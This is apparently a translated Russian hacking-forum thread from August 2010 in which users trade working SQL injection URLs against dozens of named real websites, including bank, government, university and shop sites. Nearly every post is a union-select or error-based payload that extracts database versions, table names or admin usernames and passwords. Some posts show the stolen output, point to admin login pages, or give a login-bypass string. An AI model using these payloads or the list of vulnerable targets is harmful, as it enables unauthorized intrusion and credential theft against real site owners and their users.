http://www.firmagarant.ru/document.php?id=2243+union+select+1,2,3,4,5--
PR 2
http://www.mesta-vstrech.ru/mesto.php?id=-255+union+select+1,2,3,4,5,6,group_concat%28table_ name%29,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8, 9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3, 4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8, 9,0,1,2,3,4,5,6+from+information_schema.tables--
ТИЦ 20 PR 2
http://www.pnzinfond.ru/mesto.php?id=-125+union+select+1,2,3,4,5,6,table_name,8+from+inf ormation_schema.tables+limit+3111%20+--+
PR 4
http://www.desinfinator.com/show_news.php?id=-20+union+select+1,2,3,4,5 --
ТИЦ 10 PR 4
http://www.comelsoft.com/show_news.php?id=32+union+select+1,2,3+--+
ТИЦ 20 PR 4
http://www.burgasinfo.com/show_news.php?id=-23200+order+by+1+--+
ТИЦ 50 PR 5
http://www.paktribune.com/news/print.php?id=-183128+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5, 6,us(),8,9,0,1,2,3,4,5,6,7,8,9 --
ТИЦ 80 PR 5
PRosTo_LEva
12.08.2010, 11:18
shuba said:
Мор0к said:
PR6
ТИЦ 900
http://www.rae.ru/fs/?section=content&op=show_article&article_id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,user(),27--
u217628@10.10.227.93
Code:
http://www.rae.ru/fs/?section=content&op=show_article&article_id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,concat_ws%280x3a,us er_login,user_password%29,27+from+u217628_econf.fo rum_users--+
This is from the table
Code:
u217628_econf:forum_users
Where do you log in
http://rae.ru/snt/admin/
http://www.rae.ru/forum2010/admin
http://rae.ru/phpinfo.php - the admin is kind of hinting
http://www.telbru.com.bn/news_item.php?newsid=-123+union+select+1,group_concat(username,0x3a,pass word),3,4,5+from+pusers--
PR-5
------
http://www.post.gov.bn/news_detail.php?newsid=-15+union+select+1,2,3,4
PR-6
ProGamer
13.08.2010, 22:43
http://www.erostory.ru/comment.php?ID=1+union+select+1,2,3,table_name,5+f rom+information_schema.tables--
5.0.86
Shutting it down...
PR6
http://www.enba-lyon.eu/conferences/fiche.php?a=01&id=-1+union+select+1,concat_ws(0x3a3a,user(),version() ,database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22/*
Database Version: 5.0.32-Debian_7etch12-log
Database name: panopticon
User name: panopticon@91-121-40-219.ovh.net
PR4
http://www.prague-information.eu/index.php?act=lst_nd&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 2,33,34,35,36,37,38,39,concat(0x3a3a,user(),0x3a3a ,version(),0x3a3a,database(),0x3a3a),41,42,43,44,4 5,46,47,48,49,50,51,52,53,54,55,56,57,58/*
Database Version: 5.0.32-Debian_7etch12-log
Database name: gpragueidb
User name: gpraguei@localhost
http://www.us.szc.pl/main.php/nro?xml=load_page&st=19226+or+(3,3)=(select+count(0),concat((select+ column_name+from+information_schema.columns+where+ table_name=(select+table_name+from+information_sch ema.tables+limit+17,1)+limit+2,1),floor(rand(0)*2) )from(information_schema.tables)+group+by+2)--+
-->
http://www.us.szc.pl/main.php/nro?xml=load_page&st=19226+or+(1,1)=(select+count(0),concat((select+ concat(ad_login,char(58),ad_haslo)+from+edu_admini stratorzy+limit+0,1),floor(rand(0)*2))from(informa tion_schema.tables)+group+by+2)--+
PR-6
p/s
this perversion worked on my local setup, but the site died
select column_name from information_schema.columns where table_name=(select table_name from information_schema.columns where column_name like '%Col_string%' limit 0,1) limit 0,1;
http://www.sigmaco.ru/news.php?id=-7+union+select+1,2,version(),user()
тИЦ 20
PR 1
http://www.sn-center.ru/news.php?id=7+union+select+version(),2
----
see the Title
тИЦ 20
PR 1
----
http://gambia.gtbank.com/news.php?id=7+and+1=0+union+select+1,concat_ws(0x3 a,id,username,password),3,4,5+from+users--
Some bank
PageRank 5/10
----
http://www.cnsresearchinstitute.com/news.php?id=7+union+select+1,version(),3,user(),5, 6,7,8,9,10+--+
on the side
PageRank 4/10
Code:
http://www.svrauto.ru/index.php?pageId=31&comp=-270+and+1=2+union+select+1,2,concat_ws(version(),u ser(),database(),@@version_compile_os)--
svrauto@localhost5.0.45-logsvrauto5.0.45-logredhat-linux-gnu
DezMond™
15.08.2010, 14:25
A little collection)
eurotel.by ТИЦ: 200 PR: 4
Code:
http://eurotel.by/?pd=bWFuYWdlbWVudDp7dmlld19tb2RlPXNob3BfbmV3c2xpbm V9pz_pz_pz_&md=shop_newsline&news_id=-1936'+union+select+1,2,user(),4,5,6,7,8+--+
mobilife.of.by ТИЦ: 200 PR: 3
Code:
http://mobilife.of.by/?pd=bWFuYWdlbWVudDp7dmlld19tb2RlPXNob3BfbmV3c2xpbm V9pz_pz_pz_&md=shop_newsline&news_id=-2383'+union+select+1,2,user(),4,5,6,7,8+--+
anriauto.by ТИЦ: 200 PR: 4
Code:
http://anriauto.by/?pd=bWFuYWdlbWVudDp7dmlld19tb2RlPXNob3BfbmV3c2xpbm V9pz_pz_pz_&md=shop_newsline&news_id=-2276'+union+select+1,2,user(),4,5,6,7,8+--+
interio-mebel.by ТИЦ: 200 PR: 5
Code:
http://interio-mebel.by/?pd=bWFuYWdlbWVudDp7dmlld19tb2RlPXNob3BfbmV3c2xpbm V9pz_pz_pz_&md=shop_newsline&news_id=-2222'+union+select+1,2,user(),4,5,6,7,8+--+
100tovarov.by ТИЦ: 20 PR: 4
Code:
http://www.100tovarov.by/?pd=bWFuYWdlbWVudDp7dmlld19tb2RlPXNob3BfbmV3c2xpbm V9pz_pz_pz_&md=shop_newsline&news_id=-793'+union+select+1,2,user(),4,5,6,7,8+--+
repoffice.info
Code:
http://www.repoffice.info/index.php?id=3&row=-14+union+select+1,2,3,4,5,concat_ws(0x3a3a,login,p assword),7,8+from+users+limit+1,1+--+
autoshopping.by ТИЦ: 10 PR: 4
Code:
http://www.autoshopping.by/?pd=bWFuYWdlbWVudDp7dmlld19tb2RlPXNob3BfbmV3c2xpbm V9pz_pz_pz_&md=shop_newsline&news_id=-2016'+union+select+1,2,user(),4,5,6,7,8+--+
krestikov.net ТИЦ: 30 PR: 2
Code:
http://www.krestikov.net/blog/index.php?id=3&post=../../%00
bvics.org
Code:
http://bvics.org/cms/articles/popArticle.php?id=-5+union+select+1,2,3,4,5,concat_ws(0x3a3a,username ,password),7+from+user+--+
anriauto.by ТИЦ: 200 PR: 4
Code:
http://anriauto.by/?pd=bWFuYWdlbWVudDp7dmlld19tb2RlPXNob3BfbmV3c2xpbm V9pz_pz_pz_&md=shop_newsline&news_id=-2057'+union+select+1,2,user(),4,5,6,7,8+--+
swapandtravel.com ТИЦ: 0 PR: 3
Code:
http://www.swapandtravel.com/home-exchange-item/Apartment/Canada/?noOffre=-362+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat_ ws(0x3a3a,user,pass,typeAbonnement),0x71),0x71),3, unhex(hex(user)),5+from+tMembres+--+
apostilando.com ТИЦ: 0 PR: 4
Code:
http://www.apostilando.com/download.php?cod=-92+union+select+1,2,3,4,5,6,7,concat_ws(0x3a3a,cod _usuario,nome_usuario,e_mail_usuario,senha),9,10,1 1,12,13,14,15,16,17+from+tab_usuarios+limit+0,1+--+&categoria=Word
hausparzival.com ТИЦ: 0 PR: 2
Code:
http://www.hausparzival.com/index.php?page=gallery&gpage=b&list=-1+union+select+concat_ws(0x3a3a,sitenaam,mysqluser ,mysqlpass)+from+beheerindex+--+
igrushka.by ТИЦ: 10 PR: 4
Code:
http://www.igrushka.by/?pd=bWFuYWdlbWVudDp7dmlld19tb2RlPXNob3BfbmV3c2xpbm V9pz_pz_pz_&md=shop_newsline&news_id=-831'+union+select+1,2,user(),4,5,6,7,8+--+
svisloch.by ТИЦ: 200 PR: 3
Code:
http://svisloch.by/?pd=bWFuYWdlbWVudDp7dmlld19tb2RlPXNob3BfbmV3c2xpbm V9pz_pz_pz_&md=shop_newsline&news_id=-1630'+union+select+1,2,user(),4,5,6,7,8+--+
snugpak.com ТИЦ: 10 PR: 4
Code:
http://www.snugpak.com/index.php?MenuID=93-107&ItemID=-84+union+select+1,2,concat_ws(0x3a3a,username,pass word,Email),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 ,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,3 5,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51, 52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68 ,69,70,71+from+Users+--+
pcstore.by
Code:
http://pcstore.by/?pd=bWFuYWdlbWVudDp7dmlld19tb2RlPXNob3BfbmV3c2xpbm V9pz_pz_pz_&md=shop_newsline&news_id=-2355'+union+select+1,2,user(),4,5,6,7,8+--+
studiopel.com
Code:
http://www.studiopel.com/site/index.php?id=8+union+select+1,2,3,concat_ws(0x3a3a ,user_name,password),5,6+from+user+--+&page=Prodotti#content
4baby.by ТИЦ: 200 PR: 0
Code:
http://4baby.by/?pd=bWFuYWdlbWVudDp7dmlld19tb2RlPXNob3BfbmV3c2xpbm V9pz_pz_pz_&md=shop_newsline&news_id=-2290'+union+select+1,2,user(),4,5,6,7,8+--+
unfallklinik-frankfurt.de ТИЦ: 0 PR: 4
Code:
http://www.unfallklinik-frankfurt.de/index.php?cid=-278+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,name,19,20,21,22,23,24,25,26+from+user+--+
myrmica.by ТИЦ: 200 PR: 3
Code:
http://myrmica.by/?pd=bWFuYWdlbWVudDp7dmlld19tb2RlPXNob3BfbmV3c2xpbm V9pz_pz_pz_&md=shop_newsline&news_id=-1635'+union+select+1,2,user(),4,5,6,7,8+--+
globalgroup.by ТИЦ: 200 PR: 3
Code:
http://globalgroup.by/?pd=bWFuYWdlbWVudDp7dmlld19tb2RlPXNob3BfbmV3c2xpbm V9pz_pz_pz_&md=shop_newsline&news_id=-1887'+union+select+1,2,user(),4,5,6,7,8+--+
specialtynurseries.org ТИЦ: 10 PR: 4
Code:
http://specialtynurseries.org/nursery.php?number=-11+union+select+1,2,database(),4,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28, 29,30,31,32,33,34,35,36,37,38,39,40,41+from+inform ation_schema.tables+--+
hozmag.by ТИЦ: 200 PR: 0
Code:
http://hozmag.by/?pd=bWFuYWdlbWVudDp7dmlld19tb2RlPXNob3BfbmV3c2xpbm V9pz_pz_pz_&md=shop_newsline&news_id=-2285'+union+select+1,2,user(),4,5,6,7,8+--+
dvd-world.by ТИЦ: 0 PR: 2
Code:
http://dvd-world.by/?pd=bWFuYWdlbWVudDp7dmlld19tb2RlPXNob3BfbmV3c2xpbm V9pz_pz_pz_&md=shop_newsline&news_id=-1398'+union+select+1,2,user(),4,5,6,7,8+--+
sudantv.net ТИЦ: 10 PR: 6
Code:
http://www.sudantv.net/islammag/submagadd.php?yy=-12061+union/**/select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+--+
7system.ru ТИЦ: 10 PR: 2
Code:
http://www.7system.ru/news.php?id=-36+union+select+1,2,table_name,4,5,6,7+from+inform ation_schema.tables+--+
beri.by ТИЦ: 200 PR: 3
Code:
http://beri.by/?pd=bWFuYWdlbWVudDp7dmlld19tb2RlPXNob3BfbmV3c2xpbm V9pz_pz_pz_&md=shop_newsline&news_id=-832'+union+select+1,2,user(),4,5,6,7,8+--+
belkoopstrah.by ТИЦ: 40 PR: 4
Code:
http://www.belkoopstrah.by/index.php?parent=0&issue_id=-2710+union+select+1,2,3,4,5,6,7,8,9+/*+
mpz.com.by ТИЦ: 325 PR: 4
Code:
http://mpz.com.by/ru/news.php?id=-67'+union+select+1,2,3,user(),5+--+
melford.co.uk ТИЦ: 0 PR: 5
Code:
http://www.melford.co.uk/index.php?t=details&sid=%5C&&id=-174+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18+--+
interlink.ru ТИЦ: 230 PR: 3
Code:
http://www.interlink.ru/items.php?cmd_il=-899567+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13, 14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+--+
amd.by ТИЦ: 200 PR: 4
Code:
http://www.amd.by/?pd=bWFuYWdlbWVudDp7dmlld19tb2RlPXNob3BfbmV3c2xpbm V9pz_pz_pz_&md=shop_newsline&news_id=-1650'+union+select+1,2,user(),4,5,6,7,8+--+
fotiki.by ТИЦ: 10 PR: 4
Code:
http://www.fotiki.by/?pd=bWFuYWdlbWVudDp7dmlld19tb2RlPXNob3BfbmV3c2xpbm V9pz_pz_pz_&md=shop_newsline&news_id=-1223'+union+select+1,2,user(),4,5,6,7,8+--+
jle.org.uk
Code:
http://www.jle.org.uk/photo.php?id=-7507+union+select+1,2,3,4+--+
sabaya.org ТИЦ: 0 PR: 5
Code:
http://www.sabaya.org/atemplate.php?id=-16+union+select+1,2,3,concat_ws(0x3a3a,username,pa ssword),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+fr om+users+--+
atra.org ТИЦ: 10 PR: 5
Code:
http://www.atra.org/issues/index.php?issue=-7491+union+select+1,2,3,passwd,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 ,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,4 6,47,48,49+from+users+--+
liammcarthurmsp.org.uk ТИЦ: 10 PR: 4
Code:
http://www.liammcarthurmsp.org.uk/press-releases.php?detail=y&id=-664+union+select+1,user(),3,4,5+--+
macroeng.com ТИЦ: 0 PR: 4
Code:
http://www.macroeng.com/press-releases.php?display=-6+union+select+1,2,3,4,5,6,7,8,9,10,11,12+from+use rsgroups+--+&cache=1'&record=13'
e-patent.ru ТИЦ: 40 PR: 3
Code:
http://www.e-patent.ru/cgi-bin/news.cgi?id=-717'+union+select+1,2,3,4,5,6,7+--+
bnb.ch ТИЦ: 20 PR: 6
Code:
http://www.bnb.ch/index.php?p=page&id=-1364++union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,25,26,27,concat_ws (0x3a3a,ID,bnbid,pw),29,30,31,32,33,34,35,36,37,38 ,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,5 5,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71, 72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88 ,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103, 104,105,106,107,108,109,110,111,112,113,114,115,11 6,117,118,119,120,121,122,123,124,125,126,127,128, 129,130,131,132,133,134,135,136,137,138,139,140,14 1,142,143,144,145,146,147,148,149,150,151,152,153, 154,155,156,157,158,159,160,161,162,163,164,165,16 6,167,168,169,170,171,172,173,174+from+motdepasse+--+&PHPSESSID=fbf44cc0ba0c9ef277401af0c09666ea
molchanova.ru ТИЦ: 40 PR: 3
Code:
http://www.molchanova.ru/parser.php?p_id=21&r_id=-88'+union+select+1,version(),3,4,5+--+
feldmanshepherd.com ТИЦ: 10 PR: 4
Code:
http://www.feldmanshepherd.com/press-releases.php?action=view&id=-121'+union+select+1,concat_ws(0x3a3a,username,PASS WORD,email,type,typeadmin),3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20+from+news_users+limit+1,1+--+
offtechno.com ТИЦ: 10 PR: 4
Code:
http://www.offtechno.com/releases.php?rel=-59+union+select+1,2,3,table_name,5+from+informatio n_schema.tables+--+
natalieimbruglia.com ТИЦ: 30 PR: 5
Code:
http://www.natalieimbruglia.com/releases.php?id=-4'+union+select+1,2,3,4,5,6,unhex(hex(user())),8,9 ,10,11,12,13,14+--+
ekm.ee ТИЦ: 70 PR: 6
Code:
http://www.ekm.ee/rus/kalender.php?date=2010-08-19&d_fili=3+union+select+1,2,3,4,5,6,unhex(hex(databa se())),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22, 23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 ,40,41,42,43+--+
elsemanario.com.mx ТИЦ: 10 PR: 4
Code:
http://www.elsemanario.com.mx/news/news_display.php?story_id=967'+union+select+1,2,3, 4,5,6,7,8,9,10,11,12,13,concat_ws(0x3a3a,user_name ,password,editor_house_id,permission_level),15,16, 17,18,19,20,21,22,23+from+admin_user_login+--+
P.S. No reposts!
a helicopter sales site
тИЦ — 90
PR — 3
Code:
http://www.galsaero.ru/library/archive/?ArticleId=-8+union+select+1,2,3,4,5,user(),7+--+
PR 3
Code:
http://tignon.andre.free.fr/report.php?id=-663+union+select+1,concat_ws(0x2b,version(),user() ,@@version_compile_os),3,4+--+
5.0.83+tignon.andre@172.20.245.54+unknown-linux-gnu
PR 4
Code:
http://www.age.fr/fr/module.php?ID=-15+union+Select+1,2,3,4,concat_ws(0x2b,version(),u ser(),@@version_compile_os),6,7,8,9,10,11,12,13,14 ,15,16,17+--+
5.0.90-log+agehksfbmysql@10.0.62.101+pc-linux-gnu
PR 3
Code:
http://playmate.elles-se-mettent-nues-pour-nous.fr/playmate.php?id=-111+union+select+1,2,3,4,5,6,concat_ws(0x2b,versio n(),user(),@@version_compile_os),8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30, 31,32+--+
4.0.27-standard+dbo248651352@localhost+pc-linux-gnu
PR 7
Code:
http://cedric.cnam.fr/AfficheActivite.php?id=-34+union+select+1,2,3,4,5,6,7,8,9,10,11,convert(ve rsion()+using+latin1),13+--+
4.1.10a
5.1.39-log:davidsmall:brakeman@humantorch.dreamhost.comc-linux-gnu
Google PageRank 5/10
http://davidsmallbooks.com/news_display.php?id=-2+union+select+1,2,3,concat_ws(0x3a,version(),data base(),user(),@@version_compile_os),5+--+
Continuing the aviation theme: now an airplane sales site
Code:
http://www.businessair.ru/info/news.php?id=-375+union+select+1,user(),3,4,5,6+--+
http://skydot.lanl.gov
Sky Database for Objects in Time-Domain
This is the first version of the site, which will provide interactive access to various astronomical data sets related to the time domain. It was conceived within, and grew out of, the RAPTOR project. We hope to gradually expand the data coverage as well as the capabilities of skydot and eventually turn it into a convenient tool for obtaining, assessing and analyzing data, even sky monitoring. Check for updates.
SQL queries are used to retrieve the data (more precisely, only select)...
http://skydot.lanl.gov/nsvs/nsvs.php
no comment...
SofiaLoar
16.08.2010, 06:07
http://teh-rezina.ru/?id=999+union+select+1,user(),version(),4,5,6
5.0.51a-24+lenny1
trezina@localhost
----------
http://oleg-stecenko.biz.ua/index.php?show=product&cat=135&im=&par3=&par4=&par2=&pid=-1+union+select+1,2,3,4,5,6,7,8,version(),10,user() ,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,2 8,29,30,31,32,33,34,35
oleg@localhost:5.0.24
[Feldmarschall]
16.08.2010, 06:33
Bank of Afghanistan
Code:
http://www.centralbank.gov.af/CompleteNewsDescription.php?NewsId=-13+union+ALL+select+1,concat_ws(0x3a,version(),dat abase(),user()),3,4,5--
---
Version:5.0.91-community
Database: cbank_dabwebsite
User: cbank_root@localhost
---
P.S. ..they're already on their way for me ..heh
-PRIVAT-
16.08.2010, 13:20
http://www.sd-info.ru/self.php?id=-18+union+select+1,2,3 +--+
ТИЦ 10 PR 3
Code:
http://www.moodiereport.com/category.php?id=-31+union+select+1,2,3,GROUP_CONCAT%28concat_ws%280 x3a,table_schema,TABLE_NAME%29+SEPARATOR+0x3C62723 E%29,5,6,7,8,9,10,11,12,13+from+information_schema .columns+where+column_name+like+0x257061737325+or+ column_name+like+0x25702577256425--+
PR 3
Code:
http://www.worldnet-intl.com/services.php?id=3&&s=-9%20Union%20Select%201,database%28%29,3,4,5,6,7,8, 9,10%20--
Version = 5.0.51a-24+lenny4
Database = worldnet_db
User = worldnet_user@dedi1146.nur4.host-h.net
Code:
http://www.franchisetoown.com/franchise_detail.php?id=412+and+1=0+%20Union%20Sel ect%20%201,2,3,4,5,6,7,8,9,10,11,12,13,UNHEX%28HEX %28version%28%29%29%29,15,16,17,18,19,20,21,22,23, 24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40 ,41,42,43%20--
Version = 5.0.41-community-log
User = franchi_fto@98.130.2.1
Database = franchi_fto
Code:
http://www.pucp.edu.pe/puntoedu/index.php?option=com_categorias&cat=-30+UNION+SELECT+1,2,concat%28username,0x3a,passwor d%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17%20from%20 jos_users%20limit%200,1--
Code:
http://www.pucp.edu.pe/puntoedu/index.php?option=com_categorias&cat=-30+UNION+SELECT+1,2,concat_ws%280x3a,user%28%29,ve rsion%28%29,database%28%29%29,4,5,6,7,8,9,10,11,12 ,13,14,15,16,17%20from%20jos_users%20limit%200,1--
Version: bd_puntoedu
Database: 5.0.77
Username: ]puntoedu_user@localhost
Google PR: 7
There's a second password on the admin panel...
Code:
http://www.localfirstaz.com/directory/view-cat.php?id=-23+union+select+1,2,3,GROUP_CONCAT%28concat_ws%280 x3a,table_schema,TABLE_NAME%29+SEPARATOR+0x3C62723 E%29+from+information_schema.columns+where+column_ name+like+0x257061737325+or+column_name+like+0x257 02577256425--+
http://mombaby.med.unc.edu/index.php?c=2&s=58&p=-333+union/*ii*/select+1,2,3,concat_ws(0x3a,user(),version(),datab ase()),5,6,7,8,9+from+information_schema.columns--
http://www.corpusgallery.com/exhibitions.php?id=-21'+union+select+1,2,3,version(),5,6,7/*
http://www.digitalcarversguild.com/plugin.php?ProductId=-18+union+select+1,version(),3,4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21--
http://www.maverickentertainment.cc/filmdetail.php?ProductID=724+and+ascii(lower(subst ring(user(),1,1)))=109
http://www.eonclash.com/ViewProduct.php?ProductID=-26+union+select+1,2,concat(username,char(58),user_ password),4,5,6,7,8+from+users
PR5
http://www.rtuni.org/extendedschools/page.php?page_id=-1+union+select+1,2,3,4,5,6,7,version(),9--
Database Version: 5.0.90-community
Database name: bbritton_rtu
User name: bbritton_root@localhost
http://www.positivenetworks.com/page.php?pageID=3'+or+(1,1)=(select+count(0),conca t((select+table_name+from+information_schema.table s+where+table_name=(select+table_name+from+informa tion_schema.tables+where+table_rows>ascii(lower(substring(version(),1,1)))limit+0,1)+l imit+0,1),floor(rand(0)*2))from(information_schema .tables)+group+by+2)--+
Code:
http://www.inab.org/?option=com_projects&Itemid=62&idProyecto=-336+UNION+SELECT+1,2,concat_ws%280x3a,user%28%29,v ersion%28%29,database%28%29%29,4,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28, 29,30--
Version: 5.0.22-Debian_0ubuntu6.06.2-log
Database: personal
Username: inb@localhost
Google PR: 5
-PRIVAT-
17.08.2010, 12:02
http://www.erreh.it/oldnews.php?ID=-4+union+select+version%28%29%20+--+
PR 1
http://www.faeton.spb.ru/news.php?menuitem=-115+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4 --
ТИЦ 60 PR 3
http://www.tennisinfo.ru/news.php?newsid=-7036+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3 +--+
ТИЦ 80 PR 3
http://topblogi.ru/news.php?newsid=-23+union+select+1,2,3,4,5,6,7,8,9,10 --
ТИЦ 10 PR 4
http://www.aero-premium.ru/news.php?newsid=-90+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4%20--
ТИЦ 80 PR 2
http://www.rsijournal.net/time.php?id=-25+union+select+group_concat%28table_name%29+from+ information_schema.tables%20+--+
PR 3
http://sts-austria.com/tovar.php?tovarid=-27+union+select+1,2,3,4,5%20--
ТИЦ 20 PR 2
Shop
http://youronesourcefitness.com/trainers.php?id=30+union+select+concat_ws(0x3a,@@v ersion,@@version_compile_os,@@version_comment,@@ve rsion_compile_machine),2,3,4,5,6,7,8,9,10,1,2,3,4, 5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8, 9,10,1,2
http://www.limelight-software.com/article.php?id=-59+union+select+1,2,aes_decrypt(aes_encrypt(versio n(),1),1),4,5,6,7
http://www.yangdentalgroup.net/nl/article.php?id=1512;select+version()::int,null,nul l,null,null,null,null,null,null,null,null,null,nul l,null,null&type=col
http://www.unitedpurpose.org/archive/article.php?id=100+union+select+1,2,3,4,5,6,group_ concat(table_name),8,9,10,11,12,13+from+informatio n_schema.`tables`+where+table_schema=database()
http://www.duesseldorf.feg.de/static/sebalu2/article.php?id=-48+union+select+1,2,3,4,5,6,7,8,9
http://www.israel-diaspora.info/article.php?id=-853+union+select+1,2,version(),4,5,6,7,8,9,10,11,1 2,13
http://www.eleganthomesinwesttoronto.com/ShowResources.cfm?Pageid=(select+top+1+table_name+ from+information_schema.tables)&TypeOfPage=2
http://www.musicforpercussion.com/php/NewsDetail.php?ID=-130+union+select+1,2,3,4,version(),6,7,8,9,10,11,1 2,13,14--
http://www.odessachamber.com/newsdetail.php?id=14'+or+(1,1)=(select+count(0),co ncat((select+version()+from+information_schema.tab les+limit+0,1),floor(rand(0)*2))from(information_s chema.tables)+group+by+2)--+
http://www.dkggroup.com/newsdetail.php?id=165+or+(1,1)=(select+count(0),co ncat((select+version()+from+information_schema.tab les+limit+0,1),floor(rand(0)*2))from(information_s chema.tables)+group+by+2)--+
http://www.tango04.com/news/newsdetail.php?id=-361+union+select+1,version(),3,4,5,6,7,8,9,10,11,1 2,13
http://www.dutchtub.com/english00/newsdetail.php?id=-207+union+select+1,2,version(),4,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28, 29,30,31,32,33,34&titel=eco_gadget_of_the_year!
http://www.marmoon.com/games.php?id=-437+union+select+1,2,3,version(),5,6,7,8,9,10,11,1 2,13
http://www.dakamericas.com/newsdetail.php?id=19'+or+(1,1)=(select+count(0),co ncat((select+version()+from+information_schema.tab les+limit+0,1),floor(rand(0)*2))from(information_s chema.tables)+group+by+2)--+
http://www.bathfringe.co.uk/page.php?pageid=38+union+select+1,2,3,4,5,6,7,8,9, 10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 ,27,28,29,30,31&PHPSESSID='2ebe0d1ced95240449e5f9ec7bb9219c
Code:
http://www.iccu.sbn.it/genera.jsp?id=-1+or+(select+count(*)+from+(select+1+union+select+ 2+union+select+3)x+group+by++concat(mid(version(), 1,63),+floor(rand(0)*2)))--+
PR - 7
P.S. Whoever feels like it can take it further ;-)
A small image hosting site
Code:
http://pixca.ru/login.php
SQL injection in the POST data. The query logic is SELECT * FROM ??? WHERE (login = '#login#') and (password = '#password#').
You can log in as any user :D
l: #login#') or 1=1#
p: put smth here
http://www.eonclash.com/ViewProduct.php?ProductID=27+and+substring(version (),1,1)=4
http://www.rdmarket.ru/index.php?productID=1492'+or+(1,1)=(select+count(0 ),concat((select+version()+from+information_schema .tables+limit+17,1),floor(rand(0)*2))from(informat ion_schema.tables)+group+by+2)--+
http://stroymag.kiev.ua/index.php?productID=342+or+(1,1)=(select+count(0), concat((select+version()+from+information_schema.c olumns+limit+0,1),floor(rand(0)*2))from(informatio n_schema.tables)+group+by+2)--+
http://www.vk4ajj.com/cubecart/index.php?_a=viewProd&productId=342+or+(1,1)=(select+count(0),concat((se lect+password+from+CubeCart_admin_users+limit+0,1) ,floor(rand(0)*2))from(information_schema.tables)+ group+by+2)--+
(http://www.vk4ajj.com/cubecart/modules/3rdparty/Estelles_Mod_Store/css/php.ini)
http://www.eventphotocards.com/index.php?_a=viewProd&productId=342+or+(1,1)=(select+count(0),concat((se lect+version()+from+information_schema.tables+limi t+0,1),floor(rand(0)*2))from(information_schema.ta bles)+group+by+2)--+
shell_c0de
18.08.2010, 03:31
Shop
http://www.fitshop.de/de/kategorie/riegel/18/index.html?br[0]=4+and+row(1,2)in(select+count(*),concat((select+c oncat(table_name,0x3a,column_name)+from+informatio n_schema.columns+where+column_name+like+0x25706173 7325+limit+1,1),0x3a,floor(rand(0)*2))as+a+from+in formation_schema.columns+x+group+by+a)
Script: /de/kategorie/riegel/18/index.html?
http://fitshop.de/sqladmin/
The hashes are in the neighboring section.
Continuing with shops
http://www.gskpiter.ru/index.php?productID=36+or+(1,1)=(select+count(0),c oncat((select+version()+from+information_schema.ta bles+limit+0,1),floor(rand(0)*2))from(information_ schema.tables)+group+by+2)--+